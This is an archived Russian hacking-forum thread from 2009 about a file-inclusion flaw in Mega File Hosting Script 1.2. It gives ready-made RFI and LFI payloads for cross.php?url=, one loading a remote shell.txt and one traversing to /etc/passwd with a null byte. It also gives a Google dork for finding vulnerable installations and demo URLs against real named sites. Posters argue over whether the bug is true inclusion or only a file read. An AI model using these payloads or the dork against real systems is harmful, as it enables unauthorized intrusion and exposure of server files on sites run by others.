Просмотр полной версии : Mega File Hosting [ RFI/ LFI ]
GarryCka
18.03.2009, 00:32
удаленный / локальный файл включения
для 1.2 версий :)
#############################################
# Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability #
# Home: #
# Www.hacking.ge #
#############################################
#############################################
Просто помимо этого Exploit и наслаждайтесь #
#############################################
RFI: /cross.php?url=http://site.ru/shell.txt
LFI: /cross.php?url=../../../../../../../../etc/passwd%00
#############################################
#
Author: Garry /// 25/02/2009 #
#
#############################################
с доркам та все понятно("Powered by: MFH v1"), life example где? скока не гуглил не нащел cross.php?url=, в каком собствено каталоге лежит cross.php? Имхо [:](||||||)[:].
ТС покажи где он тут http://sharemee.co.uk/ например
GarryCka
18.03.2009, 01:27
Дорк на Mega file hosting сайта:
"Powered by: MFH " :)
GarryCka
18.03.2009, 01:33
Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif
&
и локальный файл включения в Linux-сервер:
cross.php?url=../../../../../../../../etc/passwd%00 :)
Jokester
18.03.2009, 01:44
Это код из cross.php
if(function_exists('curl_init'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
elseif(ini_get('allow_url_fopen'))
{
echo file_get_contents( ($url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']) );
}
}
Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif
&
и локальный файл включения в Linux-сервер:
cross.php?url=../../../../../../../../etc/passwd%00 :)
Че та я сомневаюсь про локальные файлы, да и это не RFI - remote file include - там нету иньекта а просто чтения файла и скорее всего не локального а удаленого, да и зачем %00 ? В http://forum.antichat.ru/antichat/pic/logo.gif судя по этому ничего не добавялеться, короче скорее всего удаленые файлы просто читаються и все.
UPD покамись писал jokester все подтвердил ТС это баян, разве что как прокси использовать, вот так будет не плохая идея насчет прокси халявных
GarryCka
18.03.2009, 01:47
jokester
Да, это ошибка основана на меня
Jokester
18.03.2009, 01:49
jokester
Да, это ошибка основана на меня
Не понял фразы поясни пожалуйста
GarryCka
18.03.2009, 01:50
эксплуатировать эту работает хорошо на локальный файл включения
http://allshares.ge/cross.php?url=../../../../../../../../etc/passwd%00
Не взломать этот сайт!!!
Powered by: MFH v1.2 катит
Powered by: MFH v2.0 не катит
GarryCka
18.03.2009, 01:54
jokester
Основателем этого является ошибка: garry
it's Me :)
kysmi4
da это правда
эксплуатировать эту работает хорошо на локальный файл включения
http://allshares.ge/cross.php?url=../../../../../../../../etc/passwd%00
Не взломать этот сайт!!!
Бред =\
1) Через логи апача
2) Найти реальный путь и читать файлы в поисках
А зачем тогда писать для все версий?
GarryCka
18.03.2009, 02:06
kyzmi4
sorry it's my error!
http://milw0rm.com/exploits/8230 :)
Powered by: MFH v1.2 катит
Powered by: MFH v2.0 не катит
Я как понимаю у тебя есть MFH v1.2 выложи плиз а то погугли и так и не нашел, хочеться посмотреть что там, мне так кажеться если нет курлов то он через file_get_contets с stream_context_create читает файлы.
Jokester
18.03.2009, 02:20
Я как понимаю у тебя есть MFH v1.2 выложи плиз а то погугли и так и не нашел, хочеться посмотреть что там, мне так кажеться если нет курлов то он через file_get_contets с stream_context_create читает файлы.
Поправил свой пост с кодом.
кому интересно
http://depositfiles.com/ru/files/qq80v50yg/
Mega_File_Hosting_Script_v1.1
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot